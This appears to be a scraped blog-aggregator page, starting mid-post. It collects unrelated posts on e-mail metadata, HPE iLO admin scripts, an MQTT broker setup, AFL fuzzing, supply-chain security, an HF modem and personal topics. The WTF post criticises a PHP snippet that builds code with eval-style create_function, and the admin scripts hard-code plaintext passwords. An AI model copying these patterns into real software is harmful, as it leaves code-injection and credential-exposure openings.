The date header can likely be stripped from the outside of an encrypted message, or can have it its temporal resolution made much more coarse. However, this doesn't protect much information from the MTAs that touch the message, since they are likely to see the message when it is in transit. It may protect the message from some metadata analysis as it sits on disk, though.

The To: and Cc: headers could be stripped entirely in some cases, though that may make the e-mail more prone to being flagged as spam. However, some e-mail messages sent to Bcc groups are still deliverable, with a header of

To: undisclosed-recipients:;

Note that the Cryptographic Envelope itself may leak metadata about the recipient (or recipients), so stripping this information from the external header may not be useful unless the Cryptographic Envelope is also stripped of metadata appropriately.

The From: header could also be stripped or stubbed. It's not clear whether such a message would be deliverable, particularly given DKIM and DMARC rules for incoming domains. Note that the MTA will still see the SMTP MAIL FROM: verb before the message body is sent, and will use the address there to route bounces or DSNs. However, once the message is delivered, a stripped From: header is an improvement in the metadata available on-disk. Perhaps this is something that a friendly/cooperative MTA could do for the user?

Even worse is the Message-Id: header and the associated In-Reply-To: and References: headers. Some MUAs (like notmuch) rely heavily on the Message-Id:. A message with a stubbed-out Message-Id would effectively change its Message-Id: when it is decrypted. This may not be a straightforward or safe process for MUAs that are Message-ID-centric. That said, a randomized external Message-ID: header could help to avoid leaking the fact that the same message was sent to multiple people, so long as the message encryption to each person was also made distinct.

Stripped In-Reply-To: and References: headers are also a clear metadata win -- the MTA can no longer tell which messages are associated with each other. However, this means that an incoming message cannot be associated with a relevant thread without decrypting it, something that some MUAs may not be in a position to do.

Recommendation for encrypted message generation in 2018: copy all headers during message generation; stub out only the Subject for now.

Bold MUAs may choose to experiment with stripping or stubbing other fields beyond Subject:, possibly in response to some sort of signal from the recipient that they believe that stripping or stubbing some headers is acceptable. Where should such a signal live? Perhaps a notation in the recipient's certificate would be useful.

Key management

Key management bedevils every cryptographic scheme, e-mail or otherwise. The simplest solution for users is to automate key management as much as possible, making reasonable decisions for them. The Autocrypt project outlines a sensible approach here, so i'll leave most of this section short and hope that it's covered by Autocrypt. While fully-automated key management is likely to be susceptible either to MITM attacks or trusted third parties (depending on the design), as a community we need to experiment with ways to provide straightforward (possibly gamified?) user experience that enables and encourages people to do key verification in a fun and simple way. This should probably be done without ever mentioning the word "key", if possible. Serious UI/UX work is needed. I'm hoping future versions of Autocrypt will cover that territory.

But however key management is done, the result for the e-mail user experience is that that the MUA will have some sense of the "validity" of a key being used for any particular correspondent. If it is expressed at all, it should be done as simply as possible by default. In particular, MUAs should avoid confusing the user with distinct (nearly orthogonal) notions of "trust" and "validity" while reading messages, and should not necessarily associate the validity of a correspondent's key with the validity of a message cryptographically associated with that correspondent's key. Identity not the same thing as message integrity, and trustworthiness is not the same thing as identity either.

Key changes over time

Key management is hard enough in the moment. With a store-and-forward system like e-mail, evaluating the validity of a signed message a year after it was received is tough. Your concept of the correspondent's correct key may have changed, for example. I think our understanding of what to do in this context is not currently clear.

Planet DebianSven Hoexter: Replacing hp-health on gen10 HPE DL360

A small followup regarding the replacement of hp-health and hpssacli. Turns out a few things have to be replaced, lucky all you already running on someone else computer where you do not have to take care of the hardware.

ssacli

According to the super nice and helpful Craig L. at HPE they're planing an update for the MCP ssacli for Ubuntu 18.04. This one will also support the SmartArray firmware 1.34. If you need it now you should be able to use the one released for RHEL and SLES. I did not test it.

replacing hp-health

The master plan is to query the iLO. Basically there are two ways. Either locally via hponcfg or remotely via a Perl script sample provided by HPE along with many helpful RIBCL XML file examples. Both approaches are not cool because you've to deal with a lot of XML, so opt for a 3rd way and use the awesome python-hpilo module (part of Debian/stretch) which abstracts all the RIBCL XML stuff nicely away from you.

If you'd like to have a taste of it, I had to reset a few ilo passwords to something sane, without quotes, double quotes and backticks, and did it like this:

#!/bin/bash
pwfile="ilo-pwlist-$(date +%s)"

for x in $(seq -w 004 006); do
  pw=$(pwgen -n 24 1)
  host="host-${x}"
  echo "${host},${pw}" >> $pwfile
  ssh $host "echo \"<RIBCL VERSION=\\\"2.0\\\"><LOGIN USER_LOGIN=\\\"adminname\\\" PASSWORD=\\\"password\\\"><USER_INFO MODE=\\\"write\\\"><MOD_USER USER_LOGIN=\\\"Administrator\\\"><PASSWORD value=\\\"$pw\\\"/></MOD_USER></USER_INFO></LOGIN></RIBCL>\" > /tmp/setpw.xml"
  ssh $host "sudo hponcfg -f /tmp/setpw.xml && rm /tmp/setpw.xml"
done

After I regained access to all iLO devices I used the hpilo_cli helper to add a monitoring user:

#!/bin/bash
while read -r line; do
  host=$(echo $line|cut -d',' -f 1)
  pw=$(echo $line|cut -d',' -f 2)
  hpilo_cli -l Administrator -p $pw $host add_user user_login="monitoring" user_name="monitoring" password="secret" admin_priv=False remote_cons_priv=False reset_server_priv=False virtual_media_priv=False config_ilo_priv=False
done < ${1}

The helper script to actually query the iLO interfaces from our monitoring is, in comparison to those ad-hoc shell hacks, rather nice:

#!/usr/bin/python3
import hpilo, argparse
iloUser="monitoring"
iloPassword="secret"

parser = argparse.ArgumentParser()
parser.add_argument("component", help="HW component to query", choices=['battery', 'bios_hardware', 'fans', 'memory', 'network', 'power_supplies', 'processor', 'storage', 'temperature'])
parser.add_argument("host", help="iLO Hostname or IP address to connect to")
args = parser.parse_args()

def askIloHealth(component, host, user, password):
    ilo = hpilo.Ilo(host, user, password)
    health = ilo.get_embedded_health()
    print(health['health_at_a_glance'][component]['status'])

askIloHealth(args.component, args.host, iloUser, iloPassword)

You can also take a look at a more detailed state if you pprint the complete stuff returned by "get_embedded_health". This whole approach of using the iLO should work since iLO 3. I tested version 4 and 5.

Worse Than FailureError'd: Kind of...but not really

"On occasion, SQL Server Management Studio's estimates can be just a little bit off," writes Warrent B.

 

Jay D. wrote, "On the surface, yeah, it looks like a good deal, but you know, pesky laws of physics spoil all the fun."

 

"When opening a new tab in Google Chrome I saw a link near the bottom of the screen that suggested I 'Explore the world's iconic locations in 3D'," writes Josh M., "Unfortunately, Google's API felt differently."

 

Stuart H. wrote, "I think I might have missed out on this deal, the clock was counting up, no I mean down, I mean negative AHHHH!"

 

"Something tells me this site's programmer is learning how to spell the hard(est) way," Carl W. writes.

 

"Why limit yourself with one particular resource of the day when you can substitute any resource you want," wrote Ari S.

 

[Advertisement] BuildMaster allows you to create a self-service release management platform that allows different teams to manage their applications. Explore how!

Planet Linux AustraliaBlueHackers: Vale Janet Hawtin Reid

Janet Hawtin ReidJanet Hawtin Reid (@lucychili) sadly passed away last week.

A mutual friend called me a earlier in the week to tell me, for which I’m very grateful.  We both appreciate that BlueHackers doesn’t ever want to be a news channel, so I waited writing about it here until other friends, just like me, would have also had a chance to hear via more direct and personal channels. I think that’s the way these things should flow.

knitted Moomin troll by Janet Hawtin ReidI knew Janet as a thoughtful person, with strong opinions particularly on openness and inclusion.  And as an artist and generally creative individual,  a lover of nature.  In recent years I’ve also seen her produce the most awesome knitted Moomins.

Short diversion as I have an extra connection with the Moomin stories by Tove Jansson: they have a character called My, after whom Monty Widenius’ eldest daughter is named, which in turn is how MySQL got named.  I used to work for MySQL AB, and I’ve known that My since she was a little smurf (she’s an adult now).

I’m not sure exactly when I met Janet, but it must have been around 2004 when I first visited Adelaide for Linux.conf.au.  It was then also that Open Source Industry Australia (OSIA) was founded, for which Janet designed the logo.  She may well have been present at the founding meeting in Adelaide’s CBD, too.  OSIA logo - by Janet Hawtin ReidAnyhow, Janet offered to do the logo in a conversation with David Lloyd, and things progressed from there. On the OSIA logo design, Janet wrote:

I’ve used a star as the current one does [an earlier doodle incorporated the Southern Cross]. The 7 points for 7 states [counting NT as a state]. The feet are half facing in for collaboration and half facing out for being expansive and progressive.

You may not have realised this as the feet are quite stylised, but you’ll definitely have noticed the pattern-of-7, and the logo as a whole works really well. It’s a good looking and distinctive logo that has lasted almost a decade and a half now.

Linux Australia logo - by Janet Hawtin ReidAs Linux Australia’s president Kathy Reid wrote, Janet also helped design the ‘penguin feet’ logo that you see on Linux.org.au.  Just reading the above (which I just retrieved from a 2004 email thread) there does seem to be a bit of a feet-pattern there… of course the explicit penguin feet belong with the Linux penguin.

So, Linux Australia and OSIA actually share aspects of their identity (feet with a purpose), through their respective logo designs by Janet!  Mind you, I only realised all this when looking through old stuff while writing this post, as the logos were done at different times and only a handful of people have ever read the rationale behind the OSIA logo until now.  I think it’s cool, and a fabulous visual legacy.

Fir tree in clay, by Janet Hawtin ReidFir tree in clay, by Janet Hawtin Reid. Done in “EcoClay”, brought back to Adelaide from OSDC 2010 (Melbourne) by Kim Hawtin, Janet’s partner.

Which brings me to a related issue that’s close to my heart, and I’ve written and spoken about this before.  We’re losing too many people in our community – where, in case you were wondering, too many is defined as >0.  Just like in a conversation on the road toll, any number greater than zero has to be regarded as unacceptable. Zero must be the target, as every individual life is important.

There are many possible analogies with trees as depicted in the above artwork, including the fact that we’re all best enabled to grow further.

Please connect with the people around you.  Remember that connecting does not necessarily mean talking per-se, as sometimes people just need to not talk, too.  Connecting, just like the phrase “I see you” from Avatar, is about being thoughtful and aware of other people.  It can just be a simple hello passing by (I say hi to “strangers” on my walks), a short email or phone call, a hug, or even just quietly being present in the same room.

We all know that you can just be in the same room as someone, without explicitly interacting, and yet feel either connected or disconnected.  That’s what I’m talking about.  Aim to be connected, in that real, non-electronic, meaning of the word.

If you or someone you know needs help or talk right now, please call 1300 659 467 (in Australia – they can call you back, and you can also use the service online).  There are many more resources and links on the BlueHackers.org website.  Take care.

Planet Linux AustraliaDavid Rowe: FreeDV 700D Part 4 – Acquisition

Since 2012 I have built a series of modems (FDMDV, COHPSK, OFDM) for HF Digital voice. I always get stuck on “acquisition” – demodulator algorithms that acquire and lock onto the received signal. The demod needs to rapidly estimate the frequency offset and “coarse” timing – the position where the modem frame starts in the sequence of received samples.

For my application (Digital Voice over HF), it’s complicated by the low SNR and fading HF channels, and the requirement for fast sync (a few hundred ms). For Digital Voice (DV) we need something fast enough to emulate Push To Talk (PTT) operation. In comparison HF data modems have it easy – they can take many lazy seconds to synchronise.

The latest OFDM modem has been no exception. I’ve spent several weeks messing about with acquisition algorithms to get half decent performance. Still some tuning to do but for my own sanity I think I’ll stop development here for now, write up the results, and push FreeDV 700D out for general consumption.

Acquisition and Sync Requirements

  1. Sync up quickly (a few 100ms) with high SNR signals.
  2. Sync up eventually (a few is seconds OK) for low SNR signals over poor channels. Sync eventually is better than none on channels where even SSB is struggling.
  3. Detect false sync and get out of it quickly. Don’t stay stuck in a false sync state forever.
  4. Hang onto sync through fades of a few seconds.
  5. Assume the operator can tune to within +/- 20Hz of a given frequency.
  6. Assume the radio drifts no more than +/- 0.2Hz/s (12 Hz a minute).
  7. Assume the sample clock offset (difference in ADC/DAC sample rates) is no more than 500ppm.

Actually the last three aren’t really requirements, it’s just what fell out of the OFDM modem design when I optimised it for low SNR performance on HF channels! The frequency stability of modern radios is really good; sound card sample clock offset less so but perhaps we can measure that and tell the operator if there is a problem.

Testing Acquisition

The OFDM modem sends pilot (known) symbols every frame. The demodulator correlates (compares) the incoming signal with the pilot symbol sequence. When it finds a close match it has a coarse timing candidate. It can then try to estimate the frequency offset. So we get a coarse timing estimate, a metric (called mx1) that says how close the match is, and a frequency offset estimate.

Estimating frequency offsets is particularly tricky, I’ve experienced “much wailing and gnashing of teeth” with these nasty little algorithms in past (stop laughing Matt). The coarse timing estimator is more reliable. The problem is that if you get an incorrect coarse timing or frequency estimate the modem can lock up incorrectly and may take several seconds, or operator intervention, before it realises its mistake and tries again.

I ended up writing a lot of GNU Octave functions to help develop and test the acquisition algorithms in ofdm_dev.

For example the function below runs 100 tests, measures the timing and frequency error, and plots some histograms. The core demodulator can cope with about +/ 1.5Hz of residual frequency offset and a few samples of timing error. So we can generate probability estimates from the test results. For example if we do 100 tests of the frequency offset estimator and 50 are within 1.5Hz of being correct, then we can say we have a 50% (0.5) probability of getting the correct frequency estimate.

octave:1> ofdm_dev
octave:2> acquisition_histograms(fin_en=0, foff_hz=-15, EbNoAWGN=-1, EbNoHF=3)
AWGN P(time offset acq) = 0.96
AWGN P(freq offset acq) = 0.60
HF P(time offset acq) = 0.87
HF P(freq offset acq) = 0.59

Here are the histograms of the timing and frequency estimation errors. These were generated using simulations of noisy HF channels (about 2dB SNR):


The x axis of timing is in samples, x axis of freq in Hz. They are both a bit biased towards positive errors. Not sure why. This particular test was with a frequency offset of -15Hz.

Turns out that as the SNR improves, the estimators do a better job. The next function runs a bunch of tests at different SNRs and frequency offsets, and plots the acquisition probabilities:

octave:3> acquisition_curves




The timing estimator also gives us a metric (called mx1) that indicates how strong the match was between the incoming signal and the expected pilot sequence. Here is a busy little plot of mx1 against frequency offset for various Eb/No (effectively SNR):

So as Eb/No increases, the mx1 metric tends to gets bigger. It also falls off as the frequency offset increases. This means sync is tougher at low Eb/No and larger frequency offsets. The -10dB value was thrown in to see what happens with pure noise and no signal at the input. We’d prefer not to sync up to that. Using this plot I set the threshold for a valid signal at 0.25.

Once we have a candidate time and freq estimate, we can test sync by measuring the number of bit errors a set of 10 Unique Word (UW) bits spread over the modem frame. Unlike the payload data in the modem frame, these bits are fixed, and known to the transmitter and receiver. In my initial approach I placed the UW bits right at the start of the modem frame. However I discovered a problem – with certain frequency offsets (e.g. multiples of the modem frame rate like +/- 6Hz) – it was possible to get a false sync with no UW errors. So I messed about with the placement of the UW bits until I had a UW that would not give any false syncs at any incorrect frequency offset. To test the UW I wrote another script:

octave:4> debug_false_sync

Which outputs a plot of UW errors against the residual frequency offset:

Note how at any residual frequency offset other than -1.5 to +1.5 Hz there are at least two bit errors. This allows us to reliably detect a false sync due to an incorrect frequency offset estimate.

State Machine

The estimators are wrapped up in a state machine to control the entire sync process:

  1. SEARCHING: look at a buffer of incoming samples and estimate timing, freq, and the mx1 metric.
  2. If mx1 is big enough, lets jump to TRIAL.
  3. TRIAL: measure the number of Unique Word bit errors for a few frames. If they are bad this is probably a false sync so jump back to SEARCHING.
  4. If we get a low number of Unique Word errors for a few frames it’s high fives all round and we jump to SYNCED.
  5. SYNCED: We put up with up two seconds of high Unique Word errors, as this is life on a HF channel. More than two seconds, and we figure the signal is gone for good so we jump back to SEARCHING.

Reading Further

HF Modem Frequency Offset Estimation, an earlier look at freq offset estimation for HF modems
COHPSK and OFDM waveform design spreadsheet
Modems for HF Digital Voice Part 1
Modems for HF Digital Voice Part 2
README_ofdm.txt, including specifications of the OFDM modem.

,

Rondam RamblingsA quantum mechanics puzzle, part drei

[This post is the third part of a series.  You should read parts one and two before reading this or it won't make any sense.] So we have two more cases to consider: Case 3: we pulse the laser with very short pulses, emitting only one photon at a time.  This is actually not possible with a laser, but it is possible with something like this single-photon-emitting light source (which was actually

Planet DebianShirish Agarwal: Reviewing Agent 6

The city I come from, Pune has been experiencing somewhat of a heat-wave. So I have been cutting off lot of work and getting lot of back-dated reading done. One of the first books I read was Tom Rob Smith’s Agent 6 . Fortunately , I read only the third book and not the first two which from the synopsis seem to be more gruesome than the one which I read, so guess there is something to be thankful for.

Agent 6 copyright - Tom Rob Smith & Publishers

While I was reading about the book, I had thought that MGB is a fictious organization thought of by the author. But a quick look in wikipedia told that it is what KGB was later based upon.

I found the book to be both an easy read as well as a layered book. I was lucky to get a big print version of the book so I was able to share the experience with my mother as well. The book is somewhat hefty as it tops out around 600 pages although it’s told to be 480 pages on amazon.

As I had shared previously I had read Russka and how had been disappointed to see how the Russian public were disappointed time and again for democracy. I do understand that the book (Russka) itself is/was written by a western author and could have tapped into some unconscious biases but seemed to be accurate as to whatever I could find from public resources, that story though I may return to in a future date but this time would be for Agent 6 .

I found the book pretty immersive and at the same time lead me thinking on so many threads the author touches but then moves on. I was left wondering and many times just had to sleep, think deep thoughts as there was quite to chew on.

I am not going to spoil any surprises except to say there are quite a few twists and the ending is also what I didn’t expect.

At the end, if you appreciate politics, history, bit of adventure and have a bit of patience, the book is bound to reward you. It is not meant to be a page-turner but if you are one who enjoys savoring your drink you are going to enjoy it thoroughly.

Planet DebianJonathan McDowell: Home Automation: Getting started with MQTT

I’ve been thinking about trying to sort out some home automation bits. I’ve moved from having a 7 day heating timer to a 24 hour timer and I’d forgotten how annoying that is at weekends. I’d like to monitor temperatures in various rooms and use that, along with presence detection, to be a bit more intelligent about turning the heat on. Equally I wouldn’t mind tying my Alexa in to do some voice control of lighting (eventually maybe even using DeepSpeech to keep everything local).

Before all of that I need to get the basics in place. This is the first in a series of posts about putting together the right building blocks to allow some useful level of home automation / central control. The first step is working out how to glue everything together. A few years back someone told me MQTT was the way forward for IoT applications, being more lightweight than a RESTful interface and thus better suited to small devices. At the time I wasn’t convinced, but it seems they were right and MQTT is one of the more popular ways of gluing things together.

I found the HiveMQ series on MQTT Essentials to be a pretty good intro; my main takeaway was that MQTT allows for a single message broker to enable clients to publish data and multiple subscribers to consume that data. TLS is supported for secure data transfer and there’s a whole bunch of different brokers and client libraries available. The use of a broker is potentially helpful in dealing with firewalling; clients and subscribers only need to talk to the broker, rather than requiring any direct connection.

With all that in mind I decided to set up a broker to play with the basics. I made the decision that it should run on my OpenWRT router - all the devices I want to hook up can easily see that device, and if it’s down then none of them are going to be able to get to a broker hosted anywhere else anyway. I’d seen plenty of info about Mosquitto and it’s already in the OpenWRT package repository. So I sorted out a Let’s Encrypt cert, installed Moquitto and created a couple of test users:

opkg install mosquitto-ssl
mosquitto_passwd -b /etc/mosquitto/mosquitto.users user1 foo
mosquitto_passwd -b /etc/mosquitto/mosquitto.users user2 bar
chown mosquitto /etc/mosquitto/mosquitto.users
chmod 600 /etc/mosquitto/mosquitto.users

I then edited /etc/mosquitto/mosquitto.conf and made sure the following are set. In particular you need cafile set in order to enable TLS:

port 8883
cafile /etc/ssl/lets-encrypt-x3-cross-signed.pem
certfile /etc/ssl/mqtt.crt
keyfile /etc/ssl/mqtt.key

log_dest syslog

allow_anonymous false

password_file /etc/mosquitto/mosquitto.users
acl_file /etc/mosquitto/mosquitto.acl

Finally I created /etc/mosquitto/mosquitto.acl with the following:

user user1
topic readwrite #

user user2
topic read ro/#
topic readwrite test/#

That gives me user1 who has full access to everything, and user2 with readonly access to the ro/ tree and read/write access to the test/ tree.

To test everything was working I installed mosquitto-clients on a Debian test box and in one window ran:

mosquitto_sub -h mqtt-host -p 8883 --capath /etc/ssl/certs/ -v -t '#' -u user1 -P foo

and in another:

mosquitto_pub -h mqtt-host -p 8883 --capath /etc/ssl/certs/ -t 'test/message' -m 'Hello World!' -u user2 -P bar

(without the --capath it’ll try a plain TCP connection rather than TLS, and not produce a useful error message) which resulted in the mosquitto_sub instance outputting:

test/message Hello World!

Trying:

mosquitto_pub -h mqtt-host -p 8883 --capath /etc/ssl/certs/ -t 'test2/message' -m 'Hello World!' -u user2 -P bar

resulted in no output due to the ACL preventing it. All good and ready to actually make use of - of which more later.

Planet DebianDaniel Stender: AFL in Ubuntu 18.04 is broken

At is has been reported on the discussion list for American Fuzzy Lop lately, unfortunately the fuzzer is broken in Ubuntu 18.04 “Bionic Beaver”. Ubuntu Bionic ships AFL 2.52b, which is the current version at the moment of writing this blog post. But the particular problem comes from the accompanying gcc-7 package, which is pulled by afl via the build-essential package. It was noticed in the development branch for the next Debian release from continuous integration (#895618) that introducing a triplet-prefixed as in gcc-7 7.3.0-16 (like same was changed for gcc-8, see #895251) affected the -B option in way that afl-gcc (the gcc wrapper) can’t use the shipped assembler (/usr/lib/afl-as) anymore to install the instrumentation into the target binary (#896057, thanks to Jakub Wilk for spotting the problem). As a result, the instrumented fuzzying and other things in afl doesn’t work:

$ afl-gcc --version
 afl-cc 2.52b by <lcamtuf@google.com>
 gcc (Ubuntu 7.3.0-16ubuntu3) 7.3.0
$ afl-gcc -o test-instr test-instr.c 
 afl-cc 2.52b by <lcamtuf@google.com>
$ afl-fuzz -i in -o out -- ./test-instr
 afl-fuzz 2.52b by <lcamtuf@google.com>
 [+] You have 2 CPU cores and 1 runnable tasks (utilization: 50%).
 [+] Try parallel jobs - see /usr/share/doc/afl-doc/docs/parallel_fuzzing.txt.
 [*] Creating hard links for all input files...
 [*] Validating target binary...
 
 [-] Looks like the target binary is not instrumented! The fuzzer depends on
     compile-time instrumentation to isolate interesting test cases while
     mutating the input data. For more information, and for tips on how to
     instrument binaries, please see /usr/share/doc/afl-doc/docs/README.
	 
     When source code is not available, you may be able to leverage QEMU
     mode support. Consult the README for tips on how to enable this.
     (It is also possible to use afl-fuzz as a traditional, "dumb" fuzzer.
     For that, you can use the -n option - but expect much worse results.)
	 
 [-] PROGRAM ABORT : No instrumentation detected
          Location : check_binary(), afl-fuzz.c:6920

The same error message is put out e.g. by afl-showmap. gcc-7 7.3.0-18 fixes this. As an alternative before this becomes available, afl-clang which uses the clang compiler might be used instead to prepare the target binary properly:

$ afl-clang --version
 afl-cc 2.52b by <lcamtuf@google.com>
 clang version 4.0.1-10 (tags/RELEASE_401/final)
$ afl-clang -o test-instr test-instr.c 
 afl-cc 2.52b by <lcamtuf@google.com>
 afl-as 2.52b by <lcamtuf@google.com>
 [+] Instrumented 6 locations (64-bit, non-hardened mode, ratio 100%)

CryptogramSupply-Chain Security

Earlier this month, the Pentagon stopped selling phones made by the Chinese companies ZTE and Huawei on military bases because they might be used to spy on their users.

It's a legitimate fear, and perhaps a prudent action. But it's just one instance of the much larger issue of securing our supply chains.

All of our computerized systems are deeply international, and we have no choice but to trust the companies and governments that touch those systems. And while we can ban a few specific products, services or companies, no country can isolate itself from potential foreign interference.

In this specific case, the Pentagon is concerned that the Chinese government demanded that ZTE and Huawei add "backdoors" to their phones that could be surreptitiously turned on by government spies or cause them to fail during some future political conflict. This tampering is possible because the software in these phones is incredibly complex. It's relatively easy for programmers to hide these capabilities, and correspondingly difficult to detect them.

This isn't the first time the United States has taken action against foreign software suspected to contain hidden features that can be used against us. Last December, President Trump signed into law a bill banning software from the Russian company Kaspersky from being used within the US government. In 2012, the focus was on Chinese-made Internet routers. Then, the House Intelligence Committee concluded: "Based on available classified and unclassified information, Huawei and ZTE cannot be trusted to be free of foreign state influence and thus pose a security threat to the United States and to our systems."

Nor is the United States the only country worried about these threats. In 2014, China reportedly banned antivirus products from both Kaspersky and the US company Symantec, based on similar fears. In 2017, the Indian government identified 42 smartphone apps that China subverted. Back in 1997, the Israeli company Check Point was dogged by rumors that its government added backdoors into its products; other of that country's tech companies have been suspected of the same thing. Even al-Qaeda was concerned; ten years ago, a sympathizer released the encryption software Mujahedeen Secrets, claimed to be free of Western influence and backdoors. If a country doesn't trust another country, then it can't trust that country's computer products.

But this trust isn't limited to the country where the company is based. We have to trust the country where the software is written -- and the countries where all the components are manufactured. In 2016, researchers discovered that many different models of cheap Android phones were sending information back to China. The phones might be American-made, but the software was from China. In 2016, researchers demonstrated an even more devious technique, where a backdoor could be added at the computer chip level in the factory that made the chips ­ without the knowledge of, and undetectable by, the engineers who designed the chips in the first place. Pretty much every US technology company manufactures its hardware in countries such as Malaysia, Indonesia, China and Taiwan.

We also have to trust the programmers. Today's large software programs are written by teams of hundreds of programmers scattered around the globe. Backdoors, put there by we-have-no-idea-who, have been discovered in Juniper firewalls and D-Link routers, both of which are US companies. In 2003, someone almost slipped a very clever backdoor into Linux. Think of how many countries' citizens are writing software for Apple or Microsoft or Google.

We can go even farther down the rabbit hole. We have to trust the distribution systems for our hardware and software. Documents disclosed by Edward Snowden showed the National Security Agency installing backdoors into Cisco routers being shipped to the Syrian telephone company. There are fake apps in the Google Play store that eavesdrop on you. Russian hackers subverted the update mechanism of a popular brand of Ukrainian accounting software to spread the NotPetya malware.

In 2017, researchers demonstrated that a smartphone can be subverted by installing a malicious replacement screen.

I could go on. Supply-chain security is an incredibly complex problem. US-only design and manufacturing isn't an option; the tech world is far too internationally interdependent for that. We can't trust anyone, yet we have no choice but to trust everyone. Our phones, computers, software and cloud systems are touched by citizens of dozens of different countries, any one of whom could subvert them at the demand of their government. And just as Russia is penetrating the US power grid so they have that capability in the event of hostilities, many countries are almost certainly doing the same thing at the consumer level.

We don't know whether the risk of Huawei and ZTE equipment is great enough to warrant the ban. We don't know what classified intelligence the United States has, and what it implies. But we do know that this is just a minor fix for a much larger problem. It's doubtful that this ban will have any real effect. Members of the military, and everyone else, can still buy the phones. They just can't buy them on US military bases. And while the US might block the occasional merger or acquisition, or ban the occasional hardware or software product, we're largely ignoring that larger issue. Solving it borders on somewhere between incredibly expensive and realistically impossible.

Perhaps someday, global norms and international treaties will render this sort of device-level tampering off-limits. But until then, all we can do is hope that this particular arms race doesn't get too far out of control.

This essay previously appeared in the Washington Post.

Planet DebianAndreas Metzler: balance sheet snowboarding season 2017/16

For a change a winter with snow again, allowing a early start of the season (December 2). Due to early easter (lifts closing) last run was on April 14. The amount of snow would have allowed boarding for at least another two weeks. (Today, on May 10 mountainbiking is still curtailed, routes above 1650 meters of altitude are not yet rideable.)

OTOH weather sucked, extended periods of stable sunny weather were rare and totally absent in February and the first half of March. - I only had 3 days on piste in February. I made many kilometres luging during that time. ;-)

Anyway here it is:

2005/06 2006/07 2007/08 2008/09 2009/10 2010/11 2011/12 2012/13 2013/14 2014/15 2015/16 2016/17 2017/18
number of (partial) days25172937303025233024173029
Damüls10105101623104299448
Diedamskopf15424231341419113122319
Warth/Schröcken0304131002132
total meters of altitude12463474096219936226774202089203918228588203562274706224909138037269819266158
highscore10247m8321m12108m11272m11888m10976m13076m13885m12848m13278110151224511116
# of runs309189503551462449516468597530354634616

Worse Than FailureCodeSOD: A Quick Replacement

Lucio Crusca was doing a bit of security auditing when he found this pile of code, and it is indeed a pile. It is PHP, which doesn’t automatically make it bad, but it makes use of a feature of PHP so bad that they’ve deprecated it in recent versions: the create_function method.

Before we even dig into this code, the create_function method takes a string, runs eval on it, and returns the name of the newly created anonymous function. Prior to PHP 5.3.0 this was their method of doing lambdas. And while the function is officially deprecated as of PHP 7.2.0… it’s not removed. You can still use it. And I’m sure a lot of code probably still does. Like this block…

        public static function markupToPHP($content) {
                if ($content instanceof phpQueryObject)
                        $content = $content->markupOuter();
                /* <php>...</php> to <?php...? > */
                $content = preg_replace_callback(
                        '@<php>\s*<!--(.*?)-->\s*</php>@s',
                        array('phpQuery', '_markupToPHPCallback'),
                        $content
                );
                /* <node attr='< ?php ? >'> extra space added to save highlighters */
                $regexes = array(
                        '@(<(?!\\?)(?:[^>]|\\?>)+\\w+\\s*=\\s*)(\')([^\']*)(?:&lt;|%3C)\\?(?:php)?(.*?)(?:\\?(?:&gt;|%3E))([^\']*)\'@s',
                        '@(<(?!\\?)(?:[^>]|\\?>)+\\w+\\s*=\\s*)(")([^"]*)(?:&lt;|%3C)\\?(?:php)?(.*?)(?:\\?(?:&gt;|%3E))([^"]*)"@s',
                );
                foreach($regexes as $regex)
                        while (preg_match($regex, $content))
                                $content = preg_replace_callback(
                                        $regex,
                                        create_function('$m',
                                                'return $m[1].$m[2].$m[3]."<?php "
                                                        .str_replace(
                                                                array("%20", "%3E", "%09", "&#10;", "&#9;", "%7B", "%24", "%7D", "%22", "%5B", "%5D"),
                                                                array(" ", ">", "       ", "\n", "      ", "{", "$", "}", \'"\', "[", "]"),
                                                                htmlspecialchars_decode($m[4])
                                                        )
                                                        ." ?>".$m[5].$m[2];'
                                        ),
                                        $content
                                );
                return $content;
        }

From what I can determine from the comments and the code, this is taking some arbitrary content in the form <php>PHP CODE HERE</php> and converting it to <?php PHP CODE HERE ?>. I don’t know what happens after this function is done with it, but I’m already terrified.

The inner-loop fascinates me. while (preg_match($regex, $content)) implies that we need to call the replace function multiple times, but preg_replace_callback by default replaces all instances of the matching regex, so there’s absolutely no reason fo the while loop. Then, of course, the use of create_function, which is itself a WTF, but it’s also worth noting that there’s no need to do this dynamically- you could just as easily have declared a callback function like they did above with _markupToPHPCallback.

Lucio adds:

I was looking for potential security flaws: well, I’m not sure this is actually exploitable, because even black hats have limited patience!

[Advertisement] Utilize BuildMaster to release your software with confidence, at the pace your business demands. Download today!

,

Planet DebianEddy Petrișor: "Where does Unity store its launch bar items?" or "Convincing Ubuntu's Unity 7.4.5 to run the newer version of PyCharm when starting from the launcer"

I have been driving a System76 Oryx-Pro for some time now. And I am running Ubuntu 16.04 on it.
I typically try to avoid polluting global name spaces, so any apps I install from source I tend to install under a versioned directory under ~/opt, for instance, PyCharm Community Edition 2016.3.1 is installed under ~/opt/pycharm-community-2016.3.1.

Today, after Pycharm suggested I install a newer version, I downloaded the current package, and ran it, as instructed in the embedded readme.txt, via the wrapper script:
~/opt/pycharm-community-2018.1.2/bin$ ./pycharm.sh
Everything looked OK, but when wanting to lock the icon on the launch bar I realized Unity did not display a separate Pycharm Community Edition icon for the 2018.1.2 version, but showed the existing icon as active.

"I guess it's the same filename, so maybe unity confuses the older version with the new one, so I have to replace the launcher to user the newer version by default", I said.

So I closed the interface, then removed the PyCharm Community Edition, then I restarted the newer Pycharm from the command line, then blocked the icon, then I closed PyCharm once more, then clicked on the launcher bar.

Surprise! Unity was launching the old version! What?!

Repeated the entire series of steps, suspecting some PEBKAC, but was surprised to see the same result.

"Damn! Unity is stupid! I guess is a good thing they decided to kill it!", I said to myself.

Well, it shouldn't be that hard to find the offending item, so I started to grep in ~/.config, then in ~/.* for the string "PyCharm Cummunity Edition" without success.
Hmm, I guess the Linux world copied a lot of bad ideas from the windows world, probably the configs are not in ~/.* in plain text, they're probably in that simulacrum of a Windows registry called dconf, so I installed dconf-editor and searched once more for the keyword "Community", but only found one entry in the gedit filebrowser context.

So where does Unity gets its items from the launchbar? Since there is no "Properties" entry context menu and didn't want to try to debug the starting of my graphic environment, but Unity is open source, I had to look at the sources.

After some fighting with dead links to unity.ubuntu.com subpages, then searching for "git repository Ubuntu Unity", I realized Ubuntu loves Bazaar, so searched for "bzr Ubuntu Unity repository", no luck. Luckly, Wikipedia usually has those kind of links, and found the damn thing.

BTW, am I the only one considering some strong hits with a clue bat the developers which name projects by some generic term that has no chance to override the typical term in common parlance such as "Unity" or "Repo"?

